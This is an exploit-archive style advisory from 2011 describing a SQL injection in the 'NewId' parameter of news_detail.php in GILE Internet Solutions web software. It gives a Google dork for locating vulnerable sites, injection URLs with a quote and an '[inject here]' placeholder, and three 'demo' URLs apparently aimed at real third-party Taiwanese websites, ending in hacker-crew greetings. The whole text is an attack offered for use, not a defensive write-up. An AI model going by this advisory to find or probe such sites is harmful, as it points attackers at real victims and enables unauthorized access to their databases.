GILE Internet Solutions suffers from a remote SQL injection vulnerability.
d65ffe80f683157d0a420fede148e7bee69165920681280daf191ae3347c36d7
#Exploit Title: GILE internet solutions <= Sql Injection Vulnerability
#date: 19/08/2011
#author: CriminalCoder
#home Page: https://www.rootarea.org * https://www.el-kaide.com
#my bl0g: https://beyz4de.wordpress.com
#contact: criminalcoder[at]hotmail[Dot]de
#vendor: https://www.gile.com.tw/
#version: All Versions
#Category:: webapps
#google d0rk: inurl:".tw/news_detail.php?NewId="
#tested on: Windows XP SP2
***********************************
>Exploit
https://localhost/[path]/news_detail.php?NewId=1'
https://localhost/[path]/news_detail.php?NewId=[inject here]
>Demos
https://www.kangfu.com.tw/news_detail.php?NewId='4
https://www.sprites.com.tw/news_detail.php?NewId='4
https://www.ju-feng.com.tw/news_detail.php?NewId='6
GreetZ;[NosLeeP]<>[CodeMaster]<>[3spi0n]<>[by_musti]<>[Vezir.04]
good LucK :Z